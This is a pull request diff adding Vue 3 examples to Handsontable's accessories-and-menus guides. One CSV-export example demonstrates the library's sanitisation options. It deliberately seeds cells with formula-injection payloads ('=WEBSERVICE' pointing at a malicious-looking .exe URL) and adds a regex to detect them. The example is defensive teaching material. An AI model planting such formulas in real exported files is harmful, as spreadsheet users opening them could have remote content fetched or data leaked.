### PR TITLE
DEV-1745: Add Vue 3 examples to Accessories and menus guides

### DIFF
--- a/docs/content/guides/accessories-and-menus/context-menu/context-menu.md
+++ b/docs/content/guides/accessories-and-menus/context-menu/context-menu.md
@@ -71,6 +71,16 @@ To see the context menu, right-click on a cell. On touch devices, long-press a c
 
 :::
 
+::: only-for vue
+
+::: example #example1 :vue3
+
+@[code](@/content/guides/accessories-and-menus/context-menu/vue/example1.vue)
+
+:::
+
+:::
+
 
 ## Context menu with selected options
 
@@ -150,6 +160,16 @@ To see the context menu, right-click on a cell. On touch devices, long-press a c
 
 :::
 
+::: only-for vue
+
+::: example #example2 :vue3
+
+@[code](@/content/guides/accessories-and-menus/context-menu/vue/example2.vue)
+
+:::
+
+:::
+
 ::: only-for react
 
 ## Context menu with custom options
@@ -162,6 +182,22 @@ To see the context menu, right-click on a cell. On touch devices, long-press a c
 
 @[code](@/content/guides/accessories-and-menus/context-menu/react/example4.jsx)
 @[code](@/content/guides/accessories-and-menus/context-menu/react/example4.tsx)
+
+:::
+
+:::
+
+::: only-for vue
+
+## Context menu with custom options
+
+In addition to built-in options, you can equip your context menu with custom options.
+
+To see the context menu, right-click on a cell. On touch devices, long-press a cell to open the context menu.
+
+::: example #example4 :vue3
+
+@[code](@/content/guides/accessories-and-menus/context-menu/vue/example4.vue)
 
 :::
 
@@ -255,6 +291,16 @@ To see the context menu, right-click on a cell. On touch devices, long-press a c
 
 @[code](@/content/guides/accessories-and-menus/context-menu/angular/example3.ts)
 @[code](@/content/guides/accessories-and-menus/context-menu/angular/example3.html)
+
+:::
+
+:::
+
+::: only-for vue
+
+::: example #example3 :vue3
+
+@[code](@/content/guides/accessories-and-menus/context-menu/vue/example3.vue)
 
 :::
 

--- a/docs/content/guides/accessories-and-menus/context-menu/vue/example1.vue
+++ b/docs/content/guides/accessories-and-menus/context-menu/vue/example1.vue
@@ -1,0 +1,32 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['', 'Tesla', 'Nissan', 'Toyota', 'Honda', 'Mazda', 'Ford'],
+    ['2017', 10, 11, 12, 13, 15, 16],
+    ['2018', 10, 11, 12, 13, 15, 16],
+    ['2019', 10, 11, 12, 13, 15, 16],
+    ['2020', 10, 11, 12, 13, 15, 16],
+    ['2021', 10, 11, 12, 13, 15, 16],
+  ],
+  rowHeaders: true,
+  colHeaders: true,
+  contextMenu: true,
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example1">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/context-menu/vue/example2.vue
+++ b/docs/content/guides/accessories-and-menus/context-menu/vue/example2.vue
@@ -1,0 +1,32 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['', 'Tesla', 'Nissan', 'Toyota', 'Honda', 'Mazda', 'Ford'],
+    ['2017', 10, 11, 12, 13, 15, 16],
+    ['2018', 10, 11, 12, 13, 15, 16],
+    ['2019', 10, 11, 12, 13, 15, 16],
+    ['2020', 10, 11, 12, 13, 15, 16],
+    ['2021', 10, 11, 12, 13, 15, 16],
+  ],
+  rowHeaders: true,
+  colHeaders: true,
+  contextMenu: ['row_above', 'row_below', 'remove_row', 'clear_column'],
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example2">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/context-menu/vue/example3.vue
+++ b/docs/content/guides/accessories-and-menus/context-menu/vue/example3.vue
@@ -1,0 +1,93 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import type { DetailedSettings, MenuItemConfig } from 'handsontable/plugins/contextMenu';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const contextMenuSettings: DetailedSettings = {
+  callback(key, selection, clickEvent) {
+    console.log(key, selection, clickEvent);
+  },
+  items: {
+    row_above: {
+      disabled() {
+        return this.getSelectedLast()?.[0] === 0;
+      },
+    },
+    sp1: '---------' as MenuItemConfig,
+    row_below: {
+      name: 'Click to add row below',
+    },
+    about: {
+      name() {
+        return '<b>Custom option</b>';
+      },
+      hidden() {
+        return this.getSelectedLast()?.[1] == 0;
+      },
+      callback() {
+        setTimeout(() => {
+          alert('Hello world!');
+        }, 0);
+      },
+    },
+    colors: {
+      name: 'Colors...',
+      submenu: {
+        items: [
+          {
+            key: 'colors:red',
+            name: 'Red',
+            callback() {
+              setTimeout(() => {
+                alert('You clicked red!');
+              }, 0);
+            },
+          },
+          { key: 'colors:green', name: 'Green' },
+          { key: 'colors:blue', name: 'Blue' },
+        ],
+      },
+    },
+    credits: {
+      renderer() {
+        const elem = document.createElement('marquee');
+
+        elem.style.cssText = 'background: lightgray; color: #222222;';
+        elem.textContent = 'Brought to you by...';
+
+        return elem;
+      },
+      disableSelection: true,
+      isCommand: false,
+    },
+  },
+};
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['', 'Tesla', 'Nissan', 'Toyota', 'Honda', 'Mazda', 'Ford'],
+    ['2017', 10, 11, 12, 13, 15, 16],
+    ['2018', 10, 11, 12, 13, 15, 16],
+    ['2019', 10, 11, 12, 13, 15, 16],
+    ['2020', 10, 11, 12, 13, 15, 16],
+    ['2021', 10, 11, 12, 13, 15, 16],
+  ],
+  rowHeaders: true,
+  colHeaders: true,
+  autoWrapRow: true,
+  autoWrapCol: true,
+  height: 'auto',
+  contextMenu: contextMenuSettings,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example3">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/context-menu/vue/example4.vue
+++ b/docs/content/guides/accessories-and-menus/context-menu/vue/example4.vue
@@ -1,0 +1,45 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { ContextMenu } from 'handsontable/plugins/contextMenu';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['A1', 'B1', 'C1', 'D1', 'E1'],
+    ['A2', 'B2', 'C2', 'D2', 'E2'],
+    ['A3', 'B3', 'C3', 'D3', 'E3'],
+    ['A4', 'B4', 'C4', 'D4', 'E4'],
+    ['A5', 'B5', 'C5', 'D5', 'E5'],
+  ],
+  colHeaders: true,
+  height: 'auto',
+  contextMenu: {
+    items: {
+      row_above: {
+        name: 'Insert row above this one (custom name)',
+      },
+      row_below: {},
+      separator: ContextMenu.SEPARATOR,
+      clear_custom: {
+        name: 'Clear all cells (custom)',
+        callback() {
+          this.clear();
+        },
+      },
+    },
+  },
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example4">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/drag-to-scroll/drag-to-scroll.md
+++ b/docs/content/guides/accessories-and-menus/drag-to-scroll/drag-to-scroll.md
@@ -84,6 +84,16 @@ To see drag-to-scroll in action, click any cell in the grid below, hold the mous
 
 :::
 
+::: only-for vue
+
+::: example #example1 :vue3
+
+@[code](@/content/guides/accessories-and-menus/drag-to-scroll/vue/example1.vue)
+
+:::
+
+:::
+
 ## Configure scroll speed
 
 Pass an object to [`dragToScroll`](@/api/options.md#dragtoscroll) to control how quickly the viewport scrolls:
@@ -140,6 +150,16 @@ Use the sliders below to adjust all three parameters. The grid reloads with the 
 
 @[code](@/content/guides/accessories-and-menus/drag-to-scroll/angular/example2.ts)
 @[code](@/content/guides/accessories-and-menus/drag-to-scroll/angular/example2.html)
+
+:::
+
+:::
+
+::: only-for vue
+
+::: example #example2 :vue3
+
+@[code](@/content/guides/accessories-and-menus/drag-to-scroll/vue/example2.vue)
 
 :::
 

--- a/docs/content/guides/accessories-and-menus/drag-to-scroll/vue/example1.vue
+++ b/docs/content/guides/accessories-and-menus/drag-to-scroll/vue/example1.vue
@@ -1,0 +1,51 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];
+const colHeaders: string[] = ['Cost Center'];
+let year = 2021;
+let monthIndex = 0;
+
+while (colHeaders.length < 50) {
+  colHeaders.push(`${months[monthIndex]} ${year}`);
+  monthIndex += 1;
+
+  if (monthIndex >= months.length) {
+    monthIndex = 0;
+    year += 1;
+  }
+}
+
+const tableData: (string | number)[][] = [];
+
+for (let row = 0; row < 50; row++) {
+  const rowData: (string | number)[] = [`CC-${1000 + row}`];
+
+  for (let col = 0; col < 49; col++) {
+    rowData.push(2000 + row * 100 + col * 50);
+  }
+
+  tableData.push(rowData);
+}
+
+const hotSettings = ref<GridSettings>({
+  data: tableData,
+  colHeaders,
+  width: 500,
+  height: 220,
+  rowHeaders: true,
+  dragToScroll: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example1">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/drag-to-scroll/vue/example2.vue
+++ b/docs/content/guides/accessories-and-menus/drag-to-scroll/vue/example2.vue
@@ -1,0 +1,93 @@
+<script setup lang="ts">
+import { computed, ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'];
+const colHeaders: string[] = ['Cost Center'];
+let year = 2021;
+let monthIndex = 0;
+
+while (colHeaders.length < 50) {
+  colHeaders.push(`${months[monthIndex]} ${year}`);
+  monthIndex += 1;
+
+  if (monthIndex >= months.length) {
+    monthIndex = 0;
+    year += 1;
+  }
+}
+
+const tableData: (string | number)[][] = [];
+
+for (let row = 0; row < 50; row++) {
+  const rowData: (string | number)[] = [`CC-${1000 + row}`];
+
+  for (let col = 0; col < 49; col++) {
+    rowData.push(2000 + row * 100 + col * 50);
+  }
+
+  tableData.push(rowData);
+}
+
+const intervalMin = ref(20);
+const intervalMax = ref(500);
+const rampDistance = ref(120);
+
+const hotSettings = computed<GridSettings>(() => ({
+  data: tableData,
+  colHeaders,
+  width: 500,
+  height: 220,
+  rowHeaders: true,
+  dragToScroll: {
+    interval: { min: intervalMin.value, max: intervalMax.value },
+    rampDistance: rampDistance.value,
+  },
+  licenseKey: 'non-commercial-and-evaluation',
+}));
+</script>
+
+<template>
+  <div id="example2">
+    <div style="display: flex; gap: 28px; flex-wrap: wrap; margin-bottom: 16px">
+      <label style="display: flex; flex-direction: column; gap: 4px; font: 13px/1.4 sans-serif; color: #334155">
+        <b style="font-family: monospace">interval.min: {{ intervalMin }} ms</b>
+        <input
+          v-model.number="intervalMin"
+          type="range"
+          min="10"
+          max="200"
+          step="10"
+          style="width: 200px; cursor: pointer"
+        >
+      </label>
+      <label style="display: flex; flex-direction: column; gap: 4px; font: 13px/1.4 sans-serif; color: #334155">
+        <b style="font-family: monospace">interval.max: {{ intervalMax }} ms</b>
+        <input
+          v-model.number="intervalMax"
+          type="range"
+          min="100"
+          max="1000"
+          step="50"
+          style="width: 200px; cursor: pointer"
+        >
+      </label>
+      <label style="display: flex; flex-direction: column; gap: 4px; font: 13px/1.4 sans-serif; color: #334155">
+        <b style="font-family: monospace">rampDistance: {{ rampDistance }} px</b>
+        <input
+          v-model.number="rampDistance"
+          type="range"
+          min="20"
+          max="300"
+          step="10"
+          style="width: 200px; cursor: pointer"
+        >
+      </label>
+    </div>
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/empty-data-state/empty-data-state.md
+++ b/docs/content/guides/accessories-and-menus/empty-data-state/empty-data-state.md
@@ -85,6 +85,16 @@ To enable the Empty Data State plugin, set the [`emptyDataState`](@/api/options.
 
 :::
 
+::: only-for vue
+
+::: example #example1 :vue3
+
+@[code](@/content/guides/accessories-and-menus/empty-data-state/vue/example1.vue)
+
+:::
+
+:::
+
 ## Custom configuration
 
 The empty data state supports customization of the title, description, and action buttons.
@@ -122,6 +132,16 @@ The empty data state supports customization of the title, description, and actio
 
 :::
 
+::: only-for vue
+
+::: example #example2 :vue3
+
+@[code](@/content/guides/accessories-and-menus/empty-data-state/vue/example2.vue)
+
+:::
+
+:::
+
 ## Dynamic messages based on source
 
 You can provide different messages based on the source of the empty state (e.g., filters vs. no data). This allows for more contextual user guidance.
@@ -154,6 +174,16 @@ You can provide different messages based on the source of the empty state (e.g.,
 
 @[code](@/content/guides/accessories-and-menus/empty-data-state/angular/example3.ts)
 @[code](@/content/guides/accessories-and-menus/empty-data-state/angular/example3.html)
+
+:::
+
+:::
+
+::: only-for vue
+
+::: example #example3 :vue3
+
+@[code](@/content/guides/accessories-and-menus/empty-data-state/vue/example3.vue)
 
 :::
 

--- a/docs/content/guides/accessories-and-menus/empty-data-state/vue/example1.vue
+++ b/docs/content/guides/accessories-and-menus/empty-data-state/vue/example1.vue
@@ -1,0 +1,26 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotSettings = ref<GridSettings>({
+  data: [],
+  height: 'auto',
+  colHeaders: true,
+  rowHeaders: true,
+  navigableHeaders: true,
+  dropdownMenu: true,
+  filters: true,
+  emptyDataState: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example1">
+    <HotTable :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/empty-data-state/vue/example2.vue
+++ b/docs/content/guides/accessories-and-menus/empty-data-state/vue/example2.vue
@@ -1,0 +1,47 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const hotSettings = ref<GridSettings>({
+  data: [],
+  height: 'auto',
+  colHeaders: ['First Name', 'Last Name', 'Email'],
+  rowHeaders: true,
+  navigableHeaders: true,
+  dropdownMenu: true,
+  filters: true,
+  emptyDataState: {
+    message: {
+      title: 'No data available',
+      description: 'Please add some data to get started.',
+      buttons: [
+        {
+          text: 'Add Sample Data',
+          type: 'primary',
+          callback: () => {
+            hotRef.value?.hotInstance?.loadData([
+              ['John', 'Doe', 'john@example.com'],
+              ['Jane', 'Smith', 'jane@example.com'],
+              ['Bob', 'Johnson', 'bob@example.com'],
+              ['Alice', 'Johnson', 'alice@example.com'],
+            ]);
+          },
+        },
+      ],
+    },
+  },
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example2">
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/empty-data-state/vue/example3.vue
+++ b/docs/content/guides/accessories-and-menus/empty-data-state/vue/example3.vue
@@ -1,0 +1,72 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const hotSettings = ref<GridSettings>({
+  data: [],
+  height: 'auto',
+  colHeaders: ['First Name', 'Last Name', 'Email'],
+  rowHeaders: true,
+  navigableHeaders: true,
+  dropdownMenu: true,
+  filters: true,
+  contextMenu: true,
+  emptyDataState: {
+    message: (source) => {
+      switch (source) {
+        case 'filters':
+          return {
+            title: 'No results found',
+            description: 'Your current filters are hiding all results. Try adjusting your search criteria.',
+            buttons: [
+              {
+                text: 'Clear Filters',
+                type: 'secondary',
+                callback: () => {
+                  const filtersPlugin = hotRef.value?.hotInstance?.getPlugin('filters');
+
+                  if (filtersPlugin) {
+                    filtersPlugin.clearConditions();
+                    filtersPlugin.filter();
+                  }
+                },
+              },
+            ],
+          };
+        default:
+          return {
+            title: 'No data available',
+            description: "There's nothing to display yet. Add some data to get started.",
+            buttons: [
+              {
+                text: 'Add Sample Data',
+                type: 'primary',
+                callback: () => {
+                  hotRef.value?.hotInstance?.loadData([
+                    ['John', 'Doe', 'john@example.com'],
+                    ['Jane', 'Smith', 'jane@example.com'],
+                    ['Bob', 'Johnson', 'bob@example.com'],
+                    ['Alice', 'Johnson', 'alice@example.com'],
+                  ]);
+                },
+              },
+            ],
+          };
+      }
+    },
+  },
+  licenseKey: 'non-commercial-and-evaluation',
+});
+</script>
+
+<template>
+  <div id="example3">
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-csv/export-to-csv.md
+++ b/docs/content/guides/accessories-and-menus/export-to-csv/export-to-csv.md
@@ -60,6 +60,14 @@ Mind that CSV exports contain only raw data, and don't include formulas, styling
 :::
 :::
 
+::: only-for vue
+::: example #example1 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-csv/vue/example1.vue)
+
+:::
+:::
+
 ### Export as a JavaScript Blob object
 
 Open a console in browser developer tools to see the result for the below example.
@@ -88,6 +96,14 @@ Open a console in browser developer tools to see the result for the below exampl
 
 @[code](@/content/guides/accessories-and-menus/export-to-csv/angular/example2.ts)
 @[code](@/content/guides/accessories-and-menus/export-to-csv/angular/example2.html)
+
+:::
+:::
+
+::: only-for vue
+::: example #example2 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-csv/vue/example2.vue)
 
 :::
 :::
@@ -124,6 +140,14 @@ Open a console in browser developer tools to see the result for the below exampl
 :::
 :::
 
+::: only-for vue
+::: example #example3 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-csv/vue/example3.vue)
+
+:::
+:::
+
 ### Prevent CSV Injection attack
 
 "CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula." (from [OWASP website](https://owasp.org/www-community/attacks/CSV_Injection))
@@ -155,6 +179,14 @@ To prevent this attack, set the [`sanitizeValues` option](#sanitizevalues-boolea
 
 @[code](@/content/guides/accessories-and-menus/export-to-csv/angular/example4.ts)
 @[code](@/content/guides/accessories-and-menus/export-to-csv/angular/example4.html)
+
+:::
+:::
+
+::: only-for vue
+::: example #example4 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-csv/vue/example4.vue)
 
 :::
 :::

--- a/docs/content/guides/accessories-and-menus/export-to-csv/vue/example1.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-csv/vue/example1.vue
@@ -1,0 +1,62 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const gridData = [
+  ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
+  ['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
+  ['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
+  ['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
+  ['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
+  ['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
+  ['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
+];
+
+const hotSettings = ref<GridSettings>({
+  data: gridData,
+  colHeaders: true,
+  rowHeaders: true,
+  hiddenRows: { rows: [1, 3, 5], indicators: true },
+  hiddenColumns: { columns: [1, 3, 5], indicators: true },
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+
+function downloadCsv(): void {
+  const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
+
+  exportPlugin?.downloadFile('csv', {
+    bom: false,
+    columnDelimiter: ',',
+    colHeaders: false,
+    exportHiddenColumns: true,
+    exportHiddenRows: true,
+    fileExtension: 'csv',
+    filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
+    mimeType: 'text/csv',
+    rowDelimiter: '\r\n',
+    rowHeaders: true,
+  });
+}
+</script>
+
+<template>
+  <div id="example1">
+    <div class="example-controls-container">
+      <div class="controls">
+        <button id="export-file" type="button" @click="downloadCsv">
+          Download CSV
+        </button>
+      </div>
+    </div>
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-csv/vue/example2.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-csv/vue/example2.vue
@@ -1,0 +1,61 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const gridData = [
+  ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
+  ['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
+  ['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
+  ['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
+  ['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
+  ['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
+  ['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
+];
+
+const hotSettings = ref<GridSettings>({
+  data: gridData,
+  colHeaders: true,
+  rowHeaders: true,
+  hiddenRows: { rows: [1, 3, 5], indicators: true },
+  hiddenColumns: { columns: [1, 3, 5], indicators: true },
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+
+function exportBlob(): void {
+  const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
+  const exportedBlob = exportPlugin?.exportAsBlob('csv', {
+    bom: false,
+    columnDelimiter: ',',
+    colHeaders: false,
+    exportHiddenColumns: true,
+    exportHiddenRows: true,
+    mimeType: 'text/csv',
+    rowDelimiter: '\r\n',
+    rowHeaders: true,
+  });
+
+  console.log(exportedBlob);
+}
+</script>
+
+<template>
+  <div id="example2">
+    <div class="example-controls-container">
+      <div class="controls">
+        <button id="export-blob" type="button" @click="exportBlob">
+          Export as a Blob
+        </button>
+      </div>
+    </div>
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-csv/vue/example3.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-csv/vue/example3.vue
@@ -1,0 +1,60 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const gridData = [
+  ['A1', 'B1', 'C1', 'D1', 'E1', 'F1', 'G1'],
+  ['A2', 'B2', 'C2', 'D2', 'E2', 'F2', 'G2'],
+  ['A3', 'B3', 'C3', 'D3', 'E3', 'F3', 'G3'],
+  ['A4', 'B4', 'C4', 'D4', 'E4', 'F4', 'G4'],
+  ['A5', 'B5', 'C5', 'D5', 'E5', 'F5', 'G5'],
+  ['A6', 'B6', 'C6', 'D6', 'E6', 'F6', 'G6'],
+  ['A7', 'B7', 'C7', 'D7', 'E7', 'F7', 'G7'],
+];
+
+const hotSettings = ref<GridSettings>({
+  data: gridData,
+  colHeaders: true,
+  rowHeaders: true,
+  hiddenRows: { rows: [1, 3, 5], indicators: true },
+  hiddenColumns: { columns: [1, 3, 5], indicators: true },
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+
+function exportString(): void {
+  const exportPlugin = hotRef.value?.hotInstance?.getPlugin('exportFile');
+  const exportedString = exportPlugin?.exportAsString('csv', {
+    bom: false,
+    columnDelimiter: ',',
+    colHeaders: false,
+    exportHiddenColumns: true,
+    exportHiddenRows: true,
+    rowDelimiter: '\r\n',
+    rowHeaders: true,
+  });
+
+  console.log(exportedString);
+}
+</script>
+
+<template>
+  <div id="example3">
+    <div class="example-controls-container">
+      <div class="controls">
+        <button id="export-string" type="button" @click="exportString">
+          Export as a string
+        </button>
+      </div>
+    </div>
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-csv/vue/example4.vue
+++ b/docs/content/guides/accessories-and-menus/export-to-csv/vue/example4.vue
@@ -1,0 +1,85 @@
+<script setup lang="ts">
+import { ref } from 'vue';
+import { HotTable } from '@handsontable/vue3';
+import { registerAllModules } from 'handsontable/registry';
+import type { GridSettings } from 'handsontable/settings';
+
+registerAllModules();
+
+const hotRef = ref<InstanceType<typeof HotTable> | null>(null);
+
+const hotSettings = ref<GridSettings>({
+  data: [
+    ['https://handsontable.com', '=WEBSERVICE(A1)'],
+    ['https://github.com', '=WEBSERVICE(A2)'],
+    ['http://example.com/malicious-script.exe', '=WEBSERVICE(A3)'],
+  ],
+  colHeaders: true,
+  rowHeaders: true,
+  height: 'auto',
+  autoWrapRow: true,
+  autoWrapCol: true,
+  licenseKey: 'non-commercial-and-evaluation',
+});
+
+const csvExportOptions = {
+  bom: false,
+  columnDelimiter: ',',
+  colHeaders: false,
+  exportHiddenColumns: true,
+  exportHiddenRows: true,
+  fileExtension: 'csv',
+  filename: 'Handsontable-CSV-file_[YYYY]-[MM]-[DD]',
+  mimeType: 'text/csv',
+  rowDelimiter: '\r\n',
+} as const;
+
+function downloadWithNoSanitization(): void {
+  hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', { ...csvExportOptions });
+}
+
+function downloadWithRecommendedSanitization(): void {
+  hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', {
+    ...csvExportOptions,
+    sanitizeValues: true,
+  });
+}
+
+function downloadWithRegexpSanitization(): void {
+  hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', {
+    ...csvExportOptions,
+    sanitizeValues: /WEBSERVICE/,
+  });
+}
+
+function downloadWithFunctionSanitization(): void {
+  hotRef.value?.hotInstance?.getPlugin('exportFile')?.downloadFile('csv', {
+    ...csvExportOptions,
+    sanitizeValues: (value: string) => {
+      return /WEBSERVICE/.test(value) ? 'REMOVED SUSPICIOUS CELL CONTENT' : value;
+    },
+  });
+}
+</script>
+
+<template>
+  <div id="example4">
+    <div class="example-controls-container">
+      <div class="controls">
+        <button type="button" @click="downloadWithNoSanitization">
+          Download CSV with no sanitization
+        </button>
+        <button type="button" @click="downloadWithRecommendedSanitization">
+          Download CSV with recommended sanitization
+        </button>
+        <button type="button" @click="downloadWithRegexpSanitization">
+          Download CSV with sanitization using a regexp
+        </button>
+        <button type="button" @click="downloadWithFunctionSanitization">
+          Download CSV with sanitization using a function
+        </button>
+      </div>
+    </div>
+    <HotTable ref="hotRef" :settings="hotSettings" />
+  </div>
+</template>

--- a/docs/content/guides/accessories-and-menus/export-to-excel/export-to-excel.md
+++ b/docs/content/guides/accessories-and-menus/export-to-excel/export-to-excel.md
@@ -84,6 +84,18 @@ readonly hotSettings: GridSettings = {
 
 :::
 
+::: only-for vue
+
+```js
+import ExcelJS from 'exceljs';
+
+const hotSettings = ref({
+  exportFile: { engines: { xlsx: ExcelJS } },
+});
+```
+
+:::
+
 ## Example
 
 The table below is a Q1 sales report that demonstrates the main XLSX export features: nested column headers, numeric and checkbox cell types, a column summary total, merged cells, a custom border, a frozen first column, and a cell comment on Alice's row.
@@ -118,6 +130,16 @@ Click **Export XLSX** to download the file and open it in Microsoft Excel or any
 :::
 :::
 
+::: only-for vue
+
+::: example #example1 :vue3
+
+@[code](@/content/guides/accessories-and-menus/export-to-excel/vue/example1.vue)
+
+:::
+
+:::
+
 ## Available methods
 
 ::: only-for react
@@ -127,6 +149,18 @@ Click **Export XLSX** to download the file and open it in Microsoft Excel or any
 To use the Handsontable API, you'll need access to the Handsontable instance. You can do that by utilizing a reference to the `HotTable` component, and reading its `hotInstance` property.
 
 For more information, see the [Instance methods](@/guides/getting-started/react-methods/react-methods.md) page.
+
+:::
+
+:::
+
+::: only-for vue
+
+::: tip
+
+To use the Handsontable API, you need access to the Handsontable instance. Use a template ref on the `HotTable` component and read its `hotInstance` property.
+
